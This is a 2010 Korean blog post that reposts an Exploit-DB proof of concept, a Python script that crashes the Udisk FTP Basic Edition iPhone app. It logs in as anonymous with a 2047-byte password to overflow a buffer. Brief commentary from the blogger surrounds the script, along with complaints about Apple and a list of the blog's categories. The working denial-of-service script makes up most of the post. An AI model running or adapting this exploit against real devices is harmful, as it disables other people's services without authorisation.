IT2010. 4. 30. 09:46


iPhone을 달갑게 여기지 않는 사람이기 때문에 자세하게는 모른다.
간단한 조사과 다른 블로그를 참고한 결과 Udisk라는 어플을 사용 할 때 존재하는 Exploit인것 같다.

Udisk FTP Basic Edition는 iPhone을 FTP서버로 사용하게 도와주는 App인것 같으며,
FTP서버에 anonymous라는 ID와 0x41(2047개)라는 Pass로 접속하여 '버퍼오버플로우'를 노린것으로 보인다.

원본 : http://www.exploit-db.com/exploits/11117

# Title: Apple Iphone/Ipod - Udisk FTP Basic Edition Remote 0day DoS Exploit
# EDB-ID: 11117
# CVE-ID: ()
# OSVDB-ID: ()
# Author: mr_me
# Published: 2010-01-12
# Verified: yes
# Download Exploit Code
# Download N/A

#!/usr/bin/python
#
# Apple Iphone/Ipod - Udisk FTP Basic Edition Remote 0day DOS exploit
# Found by: Steven Seeley (mr_me) seeleymagic [at] hotmail [dot] com
# Homepage: http://6tags.com/n/
# Price: $4.99
# Download: From the app store (use your itunes account)
# Tested on: Iphone 3G - firmware 3.1.2 (Darwin kernel)
# Greetz to: Corelan Security Team::corelanc0d3r/ekse/EdiStrosar/Rick2600/MarkoT/
# Advisory: http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-003-u-disk-ftp-pre-auth-remote-dos/
#
# Note: This **could** be remotley exploitable with code execution. 
# I have not reversed this app..
  
print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                              security@corelan.be |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
  
print "[+] Apple Iphone/Ipod - Udisk FTP basic edition Remote DOS exploit"
import socket
import sys
  
def Usage():
    print ("Usage:  ./udisk.py <serv_ip>\n")
    print ("Example:./udisk.py 192.168.2.3\n")
if len(sys.argv) <> 2:
        Usage()
        sys.exit(1)
else:
    hostname = sys.argv[1]
    username = "anonymous"
    passwd = "\x41" * 2047
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 8080))
    print "[+] Connecting to the target.."
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] Sending payload.. ph33r"
    sock.send("USER %s\r\n" %username)
    sock.send("PASS %s\r\n" %passwd)
    sock.send("PWD\r\n")
    sock.close()
    print "[+] Server is now DOS'ed!"
    sys.exit(0);


이러한 문제점이 있는데,,

왠지 쉬쉬하고 있는 느낌이 드는 애플이 가증스럽게 느껴지는군요,,

안그래도 유럽이나 미주에서 유행 반짝하고 나서 우리나라에 출시한것도 기분나쁜뎅,,

하루빨리 삼성이나 LG에서 쌈박한 무언가가 나왔으면 좋겠습니다.

LG에서 새로나온 MAXX가 칩셋이 워낙 짱짱해서 하드웨어적인 면은 좋다고 하던뎅,,(물론 스마트폰이 아니지만요,,:p)

출처 : 뎅꽁이의 보안창고 http://boanchanggo.tistory.com/

'IT' 카테고리의 다른 글

우분투 gedit 한글 깨질 때..  (3) 2010.11.19
MySQL 비프음 없애기  (0) 2010.05.02
MS 포렌식 가이드  (0) 2010.04.29
무선랜 조사 도구  (0) 2010.04.29
스마트북, 퀄컴은 새로운 모바일 시장을 열어갈 수 있을까?  (0) 2010.04.29
Posted by STARSOL